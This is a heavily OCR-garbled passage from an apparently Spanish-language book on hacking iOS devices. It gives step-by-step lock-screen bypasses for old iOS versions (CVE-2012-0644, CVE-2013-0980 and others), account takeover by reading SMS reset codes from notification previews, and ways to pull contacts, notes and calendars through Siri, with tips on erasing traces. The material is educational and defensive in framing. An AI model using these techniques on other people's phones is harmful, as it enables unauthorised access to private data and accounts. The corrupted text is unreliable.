Una  vez  solicitado,  el  atacan  lo  solo  deberá  esperar  a  que  llegue  el  SMS  con  el  código.  En  el  caso  de 
los  correos  electrónicos  de  Gmail,  aparece  el  númei'o  de  verificación  que  será  necesario  para  robar 
la  contraseña  de  un  usuario»  y  apoderarse  así  de  la  cuenta. 
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Ayuda  con  las  contraseñas  para  aramosf@gmail.com 


R^lhir  un  cód  igo  de  vedflcadór  (a  través  do  un  5MS}  on  m  telétbno:  **' 


introducir  númoro  de  toJáÍDno  compii  Sygarancia:  1 


Conten  w 


iTTiEi^tn  02-16:  Sulicilijd  de  recuperación  cíe  contraseña  por  SMS  en  GiiiaiL 


Este  ataque  no  solo  se  puede  hacer  a  OmaíL  smo  a  cualquier  sistentia  de  recupenición  de  conlraseñas 
que  se  haga  porSMS.siel  usuario  tiene  activada  la  previ  su  al  izaci  onde  los  mensajes.  Esto  tanfibiénes 
trasladable  a  los  sistemas  de  recuperación  por  correo  electrónico,  aunque  sude  ser  más  complicado 
que  la  inlorniación  necesaria  paia  recupeitn  la  cuenta  entre  en  la  previ sualización  que  ofrece  el 
sistema  operativo  tOS. 


Como  se  puede  ver,  en  el  caso  de  Ilomiail  llega  en  dos  mensajes,  pero  hc  puede  ver  perfcctameiile 
el  código  en  el  segundo  de  dios,  con  lo  cual  es  uno  de  los  servicios  que  pueden  ser  atacables  con 
esta  técnica  de  previ  sualización  SMS.  Sin  embargo,  en  el  caso  de  que  estén  configuradas  solo  tas 
opciones  de  recuperación  por  medio  de  un  mensaje  de  correo  electrónico  enviado  a  una  cuenta 
asociada,  esta  estrategia  no  es  válida  ni  para  Google  ni  para  Hoíinaíi^  ya  que  el  mensaje  es  mucho 
más  largo  y  oo  se  puede  ver  la  URL  que  hay  que  utilizar  en  la  previsualización. 


.t -rriio'viíj'int  ^ 

.»!.  fnñ'-iíirEir  ^ 

“  ■  ■- 

16:21 

miércoles  2  enera 

16:15 

¡niiérOGíeE  2  eneTc 

^  -^45  60993100000 

—  4i 

Equipo  de  c  joritas  Micros^.. 

“í*  Restabfecimiento  decont... 

D 

^  -  ¿Solicitaste-  restatateccr  Iri 

aüritraseñe  para  tu  cuenta  Micr... 

+45  60993100000 
'Hpp'  1  /X 

Codiga  ct  rtsiajieü-ni  eniíi  -jw  yjtilráíiw  id  Utp 
la  colilla  ivsicfcftístt: 

** 

Re: 

ImagetL  02. 1 7:  Prevtsijídjzacióü  de  iTieiisajeii  de  rseoperación  de  cuenta  por  e-mail  y  por  SMS>  de  Moímail. 
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En  cualquier  caso,  antes  de  realizar  este  ataque  se  deben  conocer  ciinlcK  «on  las  cuernas  que  interesa 
roban  el  número  de  teléfono,  y  crear  una  malri/  de  conociniieiiro  que  permita  elegir  el  mejor  ataque 
para  cada  uno  de  los  eas43s. 


Servicio 

Recuperación  por  SMS 

Recuperación  pur  email 

Gmaii 

Si 

No 

Hfjímaíl 

Sí 

No 

Empresa 

ú 

¿? 

TziblLi  02,03:  Ro^jupcración  de  mensajes  por  pantalla. 


Con  esta  información,  el  atacante  se  abonara  hacer  pruebas  inncccsanaK  con  el  Terminal  al  que  está 
atacando,  ya  que  al  fiuaí  no  va  a  poder  borrar  el  mensaje  y  puede  que  el  dueño  del  terminal  objcLo 
del  ataque  sospeche  y  cambie  la  password  antes  de  que  el  atacante  pueda  usar  el  código.  Es  por  eso 
que  este  ataque  tal  vez  sea  conveniente  liacerfo  de  forma  coordinada  y  mandar  la  ¡nibrmación  a  un 
eonipailero  que  en  liernpt^  real  cambie  la  pass-wúj-d  desde  una  ubicación  base. 


4. Desbloqueo  de  la  pantalla  de  inicio  sin  conocer  el 
passeode  por  medio  de  bugs 

Aunque  pueda  parecer  iriiposildc,  dependiendo  de  la  versión  de  íOS  que  tenga  instalado  el  objetivo, 
es  posible  desbloquear  la  pantalla  de  petición  del  passeode  paia  acceder  a  determinadax  partes  del 
sistema  operativo.  Esto  es  debido  a  fallos  de  seguridad  un  el  código  de  bloqueo  del  terminal  que 
Apple  intenta  parchear  en  la  siguiente  versión,  pero  si  el  usuario  no  tiene  actualizado  el  sistema 
operativo  a  la  uldma  versión,  entonces  es  posible  acceder  a  esa  inforrnaciórL  .4  enuLinuación  se 
muestran  casos  conocidos  de  las  ultimas  versiones  de  ¡OS. 


CVE-2012-0644:  El  desbloqueo  por  la  SIM  tiasta  iOS  5.0.1 

En  los  terminales  iPhone  con  versiones  desde  ¡OS  J.O  basta  iOS  (independientemente  del 
modelo  de  iPhone)^  es  posible  desbloquear  cl  dispositivo  mediante  un  sencillo  truco  con  la  SIM  del 
mismo.  Indicar  que  este  fallo  no  permite  acceder  completainefite  al  terminul  y  que  solo  deja  acceder 
a  la  aplicación  de  llamar,  desde  la  que  se  pueden  acceder  a  los  contaehjs  que  tenga  el  usuario. 

El  fallo  radica  en  el  gesto  de  “desplazar  para  llamari'  y  cl  proceso  es  bastante  sencillo,  lo  que  permite 
que  en  muy  poco  tiempo  se  puedan  realizar  los  3  o  4  intentos  necesarios  par  a  conseguir  desbloquear 
el  iPhone.  í  .o  primero  que  hay  que  hacer  es  generar  una  llamada  perdida,  así  que  eí  atacante  debe 
conocer  el  número  de  teléfono  del  objcLivt].  Se  le  realiza  la  llamada  perdida,  y  aparecerá  en  la 
pantalla  de  desbloqueo.  Cuando  esté  allí,  se  debe  sacar  la  SIM,  con  lo  que  aparecerá  una  alerta  de 
SIM  no  encontrada,  tal  y  como  se  puede  ver  en  la  iriiagcii  siguicute. 
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SrnSIM  £ 

Q  fi9  -  W 

^  11:51 

viernea  4  enero 

(T)  Wo  hay  ninguria  tarjeta  SIM 

lnfDrmattoa64.corn 

_ _ _  Uamada  pencida 

11:at 

I3I 

02. 18;  Altírtu  de  No  SIM. 


A  partir  de  ese  momento  se  debe  intiodxicir  otra  vez  ia  SIM  al  tiempo  que  se  intenta  contestar  a  la 
llamada  perdida,  desplazando  hacia  la  derecha  el  aviso  de  la  llamada  perdida.  No  siempre  sale  a  la 
primera,  pero  Iras  unos  pocos  intentos  se  podrá  acceder  a  la  aplicación  de  llamadas  desde  la  que 
se  podrá,  entre  otras  opciones,  consultar  el  historial  de  llamadas,  la  lista  de  contactos,  (con  toda  la 
información  que  haya  de  ellos),  c  incluso  realizar  llamadas* 

Una  vez  que  se  consiga  el  acceso,  tiene  la  ventaja  de  que  permite  borrar  del  historial  la  llamada 
perdida  usada  para  desbloquear  el  terminal,  con  lo  que  el  objetivo  no  puede  averiguar  que  ha  sido 
víctiina  de  un  acceso  no  autorizado  a  su  lista  de  contactos. 

Para  este  ataque  es  conveniente  que  el  atacante  lleve  encima  una  llave  de  SM  o  que  tenga  siempre 
a  mano  un  clip  con  el  que  pueda  manipular  aperturas  de  SIM.  Es  le  fallo  está  solucionado  en  iOS 
5J  y  se  puede  ver  un  ejemplo  de  cómo  funciona  todo  el  proceso  en  la  siguiente  URL:  hitp://ww\v. 
stguridadApplexom/2012/02/mievo-biíg-endFhorie-to^-501-permitE.hím¡ 


CVE-2Ü11-3440:  El  desbloquea  de  la  Smart  Cover  en  iPad  2  con 
ios  5 

Este  bug  dio  la  vuelta  al  mundo  y  obligó  a  Apple  a  sacar  iOS  5.0. !  con  mucha  prisa,  ya  que  el  fallo 
era  y  es  muy  fácil  de  explotar.  No  es  un  bug  de  íPhone,  pero  parece  imposible  no  contarlo  en  este 
eapiLnlo  teniendo  en  cuenta  que  permite  acceder  absolulamcntc  a  todo  el  sistema  operativo. 
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Hfea  expioiürlo  basta  con  pulsar  el  botón  para  apagar  el  íPa¿/2  hasta  que  saiga  la  pantalla  de  apagado 
poi  la  que  hay  que  desplazar  una  flecha  hacia  la  derecha  para  confinnar  que  se  desea  apagar  el  íPad2, 
toi  ese  momento,  sin  desplazar  la  flecha  ni  cancelar  el  proceso  de  apagado,  se  cierra  la  Smart  Cover 
jse  vuelve  a  abrir. 


Lnageri  02,19:  L  onJirraacLÓri  de  apagad  C). 


Uua  vez  abierta  se  seguirá  mostrando  la  paiitaila  de  confirmación  de  apagado,  donde  será  suficiente 
con  dar  al  botón  de  cancelar  el  proceso  de  apagado  para  acceder  a  todo  el  sistema  operativo  del  iPad. 
Ln  proceso  que  dura  menos  de  1 0  segundos  y  que  deja  todo  el  iPad a  merced  de  cualquier  atacante.  Se 
puede  ver  un  vídeo  de  esta  demostración  en:  knp://w\\^^.segurfdadApp¡exom/20II/W/S-^egií^^ 
y)ara-súlrarie-¡a-coritrasenü .  h  (mi 


CVE-2010-4012;  El  desbloqueo  por  llamada  de  emergeueia  en  iOS 
4.0  y  4.1 

Este  bug  fue  suluciimario  por  Apple  en  ¡OS  4.2,  pero  los  Icmninales  iPhone  con  ia  versión  4.1 
cuentan  con  un  bug  que  le  permite  a  cualquier  atacante  acceder  a  la  aplicación  de  contactos  ctm  un 
proceso  extremadamente  sencillo.  .Solo  es  necesario  marcar  un  número  de  teléfono  desde  el  teclado 
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de  lltLfTiadíis  de  emergencia  y  pulsar  el  botón  de  apagado  para  que  el  sistema  operativo  muestre 
la  aplicación  de  llamadas,  desde  donde  se  puede  acceder  al  historial  de  las  mismas,  a  la  lista  de 
contactos  y  realizar  las  llamadas  que  se  consideren  oportunas. 

La  llamada  de  emergencia  aparecerá  en  el  historial  de  llamadas,  por  lo  que  se  debe  borrar  del  mismo 
una  vez  que  se  acceda  a  la  lista  de  contactos  si  se  quiere  evitar  dejar  algún  rastro  innecesario  en  d. 
dispositivo.  Se  puede  veruii  vídeo  con  este  ejemplo  en  la  siguiente  URL:  hipdAvHmisegrsndadÁppIe^ 
com/2  0  /  O/I  O/aun-con-clavÉ^-cualquíera-puede-IIamar  htnií 


El  bug  con  Activator  y  un  iPhone  IOS  4.3.3  con  Jailbreak 

Solo  por  terminar  de  explicar  los  desblíiqueos  conocidos  hay  que  hablar  dei  bug  que  tuvo  Activator, 
una  popular  aplicación  para  terminales  can  Jaiibreak,  que  en  la  versión  que  se  distribuyó  con  ¡Fhotíc 
4.33  permitía  acceder  al  sistema  operativo  solo  con  pulsar  dos  veces  el  botón  de  acción  desde  la 
pantalla  de  bloqueo.  Esto  es  así  debido  a  que  Activator  permite  asignar  acciones  a  cualquier  gesto 
del  tenninal  con  la  pantalla  bloqueada,  entre  ellas  la  llamada  a  la  cámara  de  fotos.  Si  se  ha  asignado 
ciiaiquier  combinación  a  la  cámara  se  salta  la  protección  de  la  pantalla  de  petición  ríe  código. 


16£34 

T&%J^ 

Acüv^tür  En  la  pantalla  de  bloq... 

Barra  da  estado 

Deslizar  derecha 

Dsliza  a  la  derecha  eri  la  barra  estada 

> 

Deslizar  izquierda 

Dellza  a  Ea  izquierda  eri  la  barra  estado 

> 

Doble  toque  derecha 

Dóble  toque  bú  la  parte  derecha  de  la.. 

> 

Doble  toque  izquierda 

Dóble  toque  en  la  parte  izquierda  de... 

> 

Presión  corta 

Mantén  presjcnada  la  bajra  de  estnídci 

1 

> 

Presionar  derecha 

Tgc^  V  mantén  en  la  parte  dertscha  de. 

> 

i 

IjDageii  02-20:  Opi.:iuntís  úe  Acífvotor  en  la  pantalla  de  bloqueo. 

Hay  que  decir  que  esta  versión  (la  4.3,3),  es  una  de  las  populares  a  día  de  hoy  entre  los  usuarios 
de  la  coiiimiidad  de  Jailbreak,  ya  que  fue  la  última  que  se  pudo  actualizar  con  JailbreakMe  el 
sitio  web  de  Comex  que  liberaba  el  terminal  con  solo  visualizar  un  documento  PDF  desde  una  web. 
Es  por  ello  que,  sí  el  íermiiml  es  uii  iOS  con  4,3,3  el  atacante  puede  inteiitar  darle  dos  clics  a!  botón 
de  acción,  agitar  el  lerminal,  probar  a  desplazar  de  arriba  abajo  y  de  abajo  arriba,  eícetera,  a  ver  si  se 
abre  el  sistema  operativo  ante  él,  debido  a  que  se  haya  conñgui'ado  alguna  aplicíición  que  se  salte  el 
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llrioquet),  tül  y  como  se  ha  mencionado  anteri ornante.  Se  puede  ver  un  vídeo  íle  esta  demostración 
Lfin  la  siguiente  URL:  http://www.segiiridadApplc.com/20U/Q7/saUarse.-la-pamalla  de- bloqueo-erL 

€¥£-20 13-0980:  Saltar  el  código  de  la  pantalla  de  bloqueo  en  iOS 
é.l  a  iOS  6.1.2 

la  acLualiVacfón  de  ¡OS  a  la  versión  6. 1  se  añadió  iiu  nuevo  Img  que  permite  saltarse  el  código  de 
[desbloqueo  y  acceder  a  la  aplicación  de  cüiiIliuUss  y  de  realización  de  Mamadas.  Dicho  bug  está  en 
nMos  los  teiiiii nales  con  esta  versión  de  softvv^are.  Los  pasos  a  realizar  son  los  siguientes: 

I  1 .  Cuando  el  teléfono  está  bloqueado  con  PIN  se  debe  ir  a  la  pan  tal  la  de  llamada  de  emergencias 
y  ahí  pulsar  el  botón  de  apagado  hasta  que  salga  la  opción  de  conñrmar  el  apagado  o  cancelan 

2.  Se  cancela  el  proocstí  de  apagado  y  se  vuelve  a  la  pantalla  de  llamadas  de  emergencia.  Alii 
I  se  podrá  ver  ya  que  algo  no  ha  ido  bien  pues  aparece  la  barra  de  mensajes  que  se  ve  cuando  el 

tennina]  está  desbloqueado  en  la  paite  snpenor. 

3.  Hacer  una  Uainada  de  emergencia  y  colgar  rápidamente, 

4.  Volver  a  bloquear  el  terminal  pulsando  una  vez  el  botón  de  eiicendido/apagadt]. 

5.  Volver  a  encender  la  pantalla  pnlsando  el  botón  de  acción  c  ir  a  la  pantalla  de  iiitroducción 
del  código  PIN, 

I  6.  Pulsar  el  botón  de  encendido/apagado  dtirante  3  segimdos- 

7.  Antes  de  que  salga  la  pantalla  de  confirmar  o  cancelar  el  proeest)  de  apagado  dar  al  botón  de 
llamadas  de  emergencia. 

Saltarse  el  código  de  desbloqueo  en  iPhone  3GS  y  en  iPhone  4  con 
iOS  6.1.3 

El  día  cltiapiics  <ie  que  se  publicara  a  nivel  mundial  la  nueva  versión  de  iOS  6.  /.i  que  había  sido 
I especialmente  creada  pam  solucionai  el  ya  contíeitlo  bug  de  saltarse  el  passeode  en  iOS  d.X,  se 
ilescubrió  ya  uua  nueva  Ibrma  de  saltarse  la  pantalla  de  bloqueo. 

El  fallo  se  prodace  solo  en  los  terminales  que  no  tienen  Slri,  es  decir,  basta  iPhone  4,  y  no  en  iFkone 
4S  o  iPhone  J,  y  vuelve  a  producirse  al  generarse  el  evento  de  No  SIM  cuando  se  realiza  lina  llxunada 
con  el  ConUvi  de  mz. 

Basta  con  hacer  una  llamada  de  emergencia  con  el  seivicio  de  llamada  de  voz,  y  cuando  empiece  a 
realizarse  la  llamada  sacar  la  SIM  Fácil  y  sejicillo.  A  partir  de  ese  momento  se  pueden  acceder  a  los 
contactos  y  a  las  fotogialieus  del  terminal . 
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Un  bug  en  LockDown  Pro  para  iPhone  con  Jailbreak 

H1  iiUiino  Lruct>  que  se  puede  hacer  en  local  es  para  nn  terminal  con  Jaiíbreak  en  el  que  no 

hay  de  por  medio  pero  si  un  código  de  bloqueo  de  aplicaciones.  Esto  se  puede  hacer  con 

lien aiii lentas  muy  populares,  qoíuq  LockDownPi  a,  que  pedirán  uim  clave  de  desbloqueo  euandís  se 
quicni  aeecdcr  a  cualquier  aplicación  del  sistema. 


[mags;rL  02,2 1 :  Salíárudo&e  LockDow fi  Pro. 


Sin  embargo,  hace  Licnipo  se  descubrió  que  este  bloqueo  de  aplicaciones  no  ñinciona  cuando  hay 
una  llamada  en  cursa,  así  que  basta  con  que  se  líame  desde  otro  número  al  teléfono  con  Jallbreak 
protegido  por  LockDowii  Pro  y  sin  cancelar  la  ilanmda,  pulsando  en  el  botón  de  accióin  se  acceda  a 
todas  las  aplicaciones  del  sistema.  Es  un  fallo  peculiar  y  muy  ctmcreLo,  aunque  de  una  importancia 
considerable 


5.  Accediendo  a  las  fotos  de  un  iPad  por  las  opciones 
del  marco  de  fotos 


Una  de  las  fuñe  iones  más  ex  Irán  as  de  íPad  es  que  se  pensó  para  poder  ser  un  marco  de  fotos  digital 
en  los  hogares,  por  lo  que,  por  defecto,  cuando  la  pantalla  de  un  ¡Fúd  está  bloqueada  aparece  el 
icono  de  una  fotogi afia  que  mostrará  las  fotagmilas  guardadas  en  el  carrete.  En  un  ¡Ptfdde  primera 
generación,  donde  no  hay  cámara  de  foLos,  es  Las  pueden  haber  sido  cargadas  por  f  Times  o  desde  los 
adjuntos  del  correo  electrónico,  pero  en  iPad 2^  IP^id  3  o  el  Aem  new  iPiici  esEis  Ibtos  pueden  haber 
sido  realizadas  por  el  dispositivo,  y  pueden  tener  información  útil. 


Imagen  02.22:  Acceso  a  las  lotos  de  iPíiJ:  Capción  marca  de  latiw. 


*  iíiUfitit)  /l,  Ataques  locales  (IPkone  Local  Tricks) 
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‘•I  hay  lili  ¡Píki  al  alcance  dei  atacante  es  posible  que  encuentre  algo  de  iiifortriación  ‘"jugiísa’'  entre 
-n  Jo[os,  ya  que  los  usuarios  suelen  hacer  fotos  a  oasí  “cualquier''  cosa,  por  lo  que  con  solo  pulsar 
k  I  (l  uiiu  de  la  ñor  Se  podrá  acceder  a  las  imágenes  y  a  su  mfonnaci6n. 

Accediendo  a  las  fotos  de  un  iPhone  con  iOS  5.X  cambiando  la  fecha 

\U\\  uti  hug  muy  curioso  en  la  cántara  de  fotos  en  los  terminales  con  iOS  5  gracias  a  que  se  permite 
iriíliiiíiir  con  el  equipo  como  si  fuera  una  cámara  de  fotos  sin  necesidad  de  desbloquear  c]  teniiinah 
4m  embargo,  la  protección  que  tiene  íPhoue  es  que  se  pueden  hacer  fotogiañas  y  acceder  a  aquellas 
tjur  hayan  realizado  solo  en  esta  sesión,  es  decin  las  fotos  dcl  carrete  están  supuestamente  a  salvo, 

embargo,  esta  protección  es  Jiiuy  pobre,  ya  que  solo  utiliza  la  techa  del  dispositivo.  Si  la  foto 
'  iin  hecho  en  un  iiiorncnlt>  posterior  a  la  fecha  en  la  que  se  bloqueó  el  sistema,  se  mostrará  sin 
íii  t  csidíiíl  de  introducir  el  código  para  desbloquear  el  teiminal,  La  piegunLa  que  surge  es  ¿cómo  se 
uimbia  la  fecha  para  ver  las  fotos?  Pues  las  aUemativas  son  p<icas  y  peculiares,  pero  es  posible. 

I  I  ks  Icr  mínales  ¡Pad  2,  iPad  3  o  Ntr^v  iPaíI{quQ  salieron  con  i  OS  3  o  superior)  que  solo  utilizan 
h  r  /■?,  usan  un  servidor  NTP  imie  ProtoeoíA^  que  se  conectan  cada  basiauLc  tiempo,  lo 

ipic  ha  llevado  a  que  los  equipos  adolecieran  de  desiiicronización  dcl  reloj  y  hubiera  muchas  quejas, 

I  ji  este  caso  se  podría  intentar  suplanLar  el  servidor  NTP  en  la  red  y  darle  una  fecha  de  hace  1  año, 
lo  que  períinliriu  que  se  pudier^^n  ver  las  fotos  realizadas  en  el  último  año, 

fu  el  cuso  de  ¡Pheme,  la  sincronización  horaria  se  hace  a  través  de  las  iones  de  enniunicación  de 
irle  Iónica,  que  se  encargan  de  enviar  labora  con  ce  La  en  cada  rcinicio.  Fsto  abre  la  puerta  a  un  ataque 
nu  diante  una  estación  BT55  falsa,  lal  y  como  se  índica  más  adelante  en  este  libro.  Así  que,  con  un 
tilaqiic  ciíordinado  se  podría  cambiar  la  fecha  desde  una  falsa  estación  de  telefonía  (es  posible  hacer 
iMi  a  laque  dirigido  y  solo  cambiar  la  hora  de  un  único  dispositivo)  y  la  persona  que  tenga  acceso 
podrá  ver  las  fotografías  con  solo  activar  la  cámara. 

f  II  eslüs  dos  cascís,  es  necesario  que  el  terminal  tenga  la  configuración  por  defecto  de  "'Configurar 
\a  hora  mitomátlcammte 


Jiiiíigcii  ÍJ2.23:  Ajuste  aucomático  de  horae  ¡cano  íle  acceso  a  Iíi  cáuiara  t^ii  ki  paniulUi  de  bluquco. 

hii  Última  opción  es  pri  ataque  con  descuido  o  ingeniería  SDCiab  pero  es  necesario  contar  con  la 
iiyiida  de  la  victima  que  dehe  ser  engañada  para  que  ponga  una  fecha  auíerior  sin  saber  lo  que  esrá 
haciendo  realmente. 


42 


//ú'cJcmg  de  dfspasiJiim  ¿OS/  ¿F/íone  efe  ¿Fad 


6.  Explorando  la  agenda  usando  el  control  de  voz 


Apple  introdujo  Siri,  un  asistento  virtual  que  se  activa  por  la  voz,  (del  que  se  va  a  hablar  largo  y 
tendido  nn  poco  más  adelante)  en  i^hone  4S  y  está  presente  en  iPhone  5.  En  los  tenninales  iPhone  4 
o  iPbom  íGS  existe  la  pirsibilidad  de  utilizar  el  Control  de  voz  para  acceder  a  las  opciones  de  hacer 
Haiiiaclas  de  voz  o  por  medio  de  FaceTime. 


■V' 


treonífto!  por  del  iRod  esfá 


Imagen  02.24;  De^liahi litar  Vof.ee  Cofitpoí  con  pantalla  bloqueada. 


Este  servicio  es  posible  desactivarlo  dentro  tic  las  opciones  de  coníiguractón.  pero  sin  embargo, 
se  descubrid  que  hay  un  bug  eii  todas  las  versiones  de  ¿OS  .5, A  para  Icrinitiaies  ¡Phaiie  4  o  ¡Phons] 
3GS\  que  permite  acceder  a  la  lisia  de  contactos  y  hacer  llamadas  por  FacePme  etm  el  leniiina! 
bloqueado,  a  pesar  de  que  haya  sido  desbabi litado  csLc  sendeio.  El  fallo  está  en  el  módulo  creado i 
para  realizar  las  II ainadas  de  emergencia. 

Para  consultar  la  lista  de  contados  se  debe  entrar  en  el  teclado  de  llamadas  de  emct^cncia,  dejar 
pulsado  el  botón  de  acción  unos  segnndos  y  se  activará  el  Canlrolde  voz.  Desde  él  se  pueden  realizar' 
llamadas  por  FacífTíme. 


Imagen  02.2Í:  [Jamar  por 


(  üpítuío  ¡i.  Ataques  locales  (iPhone  Local  Tricks) 
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Leí  manera  de  ntiiizarJo  es  decir  l  'aceTime  y  el  nombre  de  nn  coiitacto*  Si  este  está  en  k  lisLa  se  podrá 
hocer  la  llamada.  Sí  hay  varios  contactos  coa  el  inisiTio  ntnnbre  o  varios  ntimeros  o  cuentas  asociadas 
.1  !.ifi  mismo  conlacLo,  se  podrá  ir  diciendo  entre  ellos.  Bn  cualquier  caso,  no  se  puede  acceder  a  la 
¡Mformacido  personal  de  ninguno  de  ellos,  y  solo  snve  para  saber  si  está  en  la  lisia  de  eonlaclos  o 
para  llamar  a  uno  de  los  coiitacíos  que  estén  en  dk  pi^r  FaceTíme. 

Bsle  fallo  afecta  a  usiiai  ios  con  lOS  5  y  a  usuarios  con  iOS  6.x  con  teriní nales  iLhone  3 Gil  o  iPhom 
4,  ya  que  en  dios  no  está  disponible  el  uso  de  Slri. 


VI anejando  el  teléfono  con  Siri  en  iOS  5  e  iOS  6  con  iPhone  4S  o 
íPhone  5 

l'n  los  rarminales  iPhonc  4S,  iPhone  5  y  los  iPad  3,  el  principal  juguete  para  sacar  información  de 
d  sin  necesidad  de  lenei'  el  passco¿le  cic  desbltR|iieo  es  Sfrí.  Bste  asistente  personal  va  mucho  más 
íillá  que  1111  simple  reconocimiento  de  órdenes  por  voz,  y  está  prepaiado  para  hacer  múltiples  tareas. 
Por  defecto,  está  listo  para  hacerlas  aun  cuando  el  dispositivo  está  bloqueado,  lo  que  permite  sacar 
mucha  información  de  éL 

Pata  activarlo  basta  con  dejar  pulsado  el  botón  de  acción  y  esperar  que  suene  la  música  y  salga  Siri 
para  atender  al  usuario.  A  partir  de  ese  momento  se  le  puede  pedir  que  haga  cosas  con  el  disjiositivo. 
Aquí  se  van  a  mostrar  algunas  de  las  posibilidades  que  se  pucdcii  obtener  jugando  con  Siri. 

irjiviíir  nicnsajcs  y  realizar  llamadas  a  cunlaetns:  Siri  tiene  la  capacidad  de  enviar  correos 
electrónicos,  mensajes  SMS,  iMessage  y  realizar  llamadas  de  teléfono  o  FaceTime  a  cualquier 
contacio  de  la  agenda,  Solo  hay  que  pedírselo:  ''Enviar  mensaje  de  curreo  electrónico  a  X'l 

lliiviar  mensajes  y  realizar  llaniadas  n  iiúnicras  de  leléfunu  que  na  están  en  la  agenda  de 
contactDs:  Esto  es  pcrfccLti  pura  enviar  un  mensaje  a  un  contacto  y  genemr  un  conflicto  del  que  sacar 
partido  en  un  proceso  de pefriesííng. 

Publicar  en  redes  sociales:  Con  el  dispositivo  bloqueado,  a  través  de  Siri,  es  posible  publicar  Fvee.ts 
o  mensajes  en  FacebooL  “Publica  un  TweeF  o  “Publica  un  mensaje  en  Facebook"  es  suficiente  paia 
conseguir  haeerlo, 

<  '<insulta  de  ellas  en  el  calendario:  Se  puede  hacer  casi  cualquier  pregunta,  como  ''¿Que  reuniones 
rengo  en  Marzo  en  el  calendario?'"  *^¿Qiié  reuniones  tengo  hoy?''  tengo  reuní ón  con 

í  hema?''  Todas  estas  consultas  se  lanzan  sobre  la  aplicación  de  Calendaiio,  y  aunque  no  se  puede 
ver  el  detalle  completo  de  cada  entrada,  sí  que  es  posible  sacar  información  suficíoTiLe  de  éb 

Crear  citas  en  el  calendario;  Una  de  las  caiaclerustiLus  más  extrañas  es  la  capacidad  de  crear 
reuniones  con  personas  de  los  contactos  en  la  agenda.  Basta  con  utilizar  una  orden  del  tipo  “Crear 
una  reunión  con  X  para  mañana  a  las  y  Siri  creará  la  reunióo,  pudiendo  configurar  a  gusto  k 
agenda  del  objetivo. 


44 


Hacking  de  disposiüvos  IOS:  íPhone  <&  iPad 


düil  nfiri'vlslíir  ái5  tíiiSS  i 

iTiavi^atiir  2G  ES 

¿&’  L\uú  lo  puodóqyik&r? 

1  «  Crear  una  reunión  con 

Rodol  para  m anana  por 

Qué  reuniones  tengo  en 
el  mes  de  enero  » 

la  mañana  a  las  ocho 

De  aaierdo.  ho  Groado  una 

Mira,  Inlc^mattea64^  he 

reunión  pór'  Rodolfo  Pordon 

ennontí'ddo  iq  reuniónos  entre 
hoy  Y  ei  31  de  enero  de 

billar  para  inanana, 

A  TechNel  Foreveril! 

^  R'^DÉnuriirtta  il  43,  en  N-,., 

14:00  ' 

Módulo  4:  S©guiidfs„. 

08:30 

mortoii,  tS 

0  Gira  Up  To  Secura, .. 

I2d}0 

viEi«nEi!j.  Dftnrs  üt- 


:  iiv 


i  i«  ‘1  ii  a 

u  H  fr  "R  *■  m 

ti  d  K  ei  K  »  e? 


R^níoii 


07:00 


Cancstar  !3fc‘rífíimar 


Imagen  02,26:  ConsiLliar  y  LTeiirrcuiiLmies  en  el  eüIendL'.rUL 


Búsqueda  de  contactos:  A  diferencia  del  bug  con  FaeeTime  docide  solo  se  puede  saber  si  está  el 
contacto  o  no,  y  realizar  una  llamada  por  Paaelime,  aquí  se  puede  saber  si  está  o  no  en  la  agenda, 
y  acceder  á  toda  k  información  del  mismo,  es  decir,  nombi-e,  apellidos,  números  de  teléfono, 
descripción  y  direcciones  de  email,  con  lo  que  ck  pcriecto  paia  emaer  los  datos  sensibles  que 
interesen. 


J  m  ugt;ii  02 .27:  B  lis(.[  ue dti  d  tí  cotí  La  u  £> . 
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31Ü0  de  los  CQütactos  liay  uua  coxis uka  muy  útil:  Conocer  los  datos  del  dueño  del  Lenrilnal,  para 
f  basta  con  preguntar  ^^Miiéstrame  mi  contacto  ■\ 

calizar  puntos  de  interés  guardados  en  el  GPS:  También,  con  el  dispositivo  bloqueado,  ss 
jsible  buscar  una  rula  a  un  punto  de  interés  como  'indícame  cómo  ir  a  casa  de  Raquel”  o  ''Indícame 
no  llegar  a  mi  casabe  AulOínáLicameriLe  se  generará  una  ruta  en  Liapx  que  Le  llevará  hasta  esa 
cación. 

lastrar  las  notas  creadas:  Desde  Síri,  con  un  simple  comando  “Muéstrame  todas  las  notas”  se 
éde  acceder  a  ios  priiiieros  caracLeres  de  las  notas  que  están  oreadas.  EsU]  se  puede  fillrar  por 
ba,  usando  “Muéstrame  las  notas  del  10  de  Febrero”  SÍ  se  quiere  ver  el  contenido  de  ima  nota,  es 
L  sencillo  como  buscar  una  palabra  en  el  título  de  la  nota,  poniendo  “Búscame  la  nota  amigos”,  y 
no  se  puede  ver  en  la  Imagen  siguieriLc  sale  el  contenido  completo. 

Es  posible  también  crear  una  nota  y  guardar  cualquier  información  en  ella.  Además,  si  el  terminal 
^hone  está  sincronizado  con  íCJoucl  se  podían  ver  las  notas  creadas  por  todos  los  dispositivos 
imili/afido  la  misma  cuenta  de  Apple  TD,  por  ejemplo  un  Mac  u  otro  dispositivo  como  íPad.  Tanto 
k  creación  como  la  lectura  de  las  notas  será  un  proceso  que  se  hará  sobre  todos  los  dispositivos 
«SüDectados  a  la  misma  cuenta, 


Aquí  están  todas  tus  notas: 


«  Muéstrame  la  nota 
amigos  *> 


He  encontrado  asta  nota: 


tgnglfilg  un  fauMi  dta  &ahido8 


magen  02.28:  Coíisulta  de  notas  decide  Slri.  También  se  pueden  crear  netas. 


áemás  de  todas  estaos  acciones,  en  Jas  versiones  de  /OS  5.0  y  5. Ü.l  eon  terminales  iPhoiie  es 
sible  acceder  ai  mensaje  seleccionado  en  la  aplicación  Malí  haciendo  uso  de  las  opciones  de 
enviar  por  lo  que  Apple  tuvo  que  solucionar  este  hug  en  iOS  5.  /.  Si  la  versión  es  un  iOS  5.0  o  ¡OS 
%M.i  usando  “Reenviar  mensaje  de  correo  electrónico”  se  podrá  ver  el  contenido  del  mismo. 

Jsy  que  tener  presente  que  Siri  procesa  la  voz  en  los  seiTÍ dores  de  Apple,  así  que  es  iiecesajio  que  el 
nlnal  esté  conccLudt)  a  Internet  a  través  de  alguna  conexión.  Si  no  es  así,  entonces  no  funcionará 
[iguna  de  las  funciones.  Además,  hay  que  tener  en  cuenta  que  en  ios  senadores  de  Apple  quedarán 
^istrados  todos  los  comandos  de  voz,  aunque  no  es  habitual  que  en  un  proceso  de  pen¿e:^itng 
aJuuier  los  revise. 


CVE-2(U2-3750:  Acceso  a  los  códigos  de  PassBook 

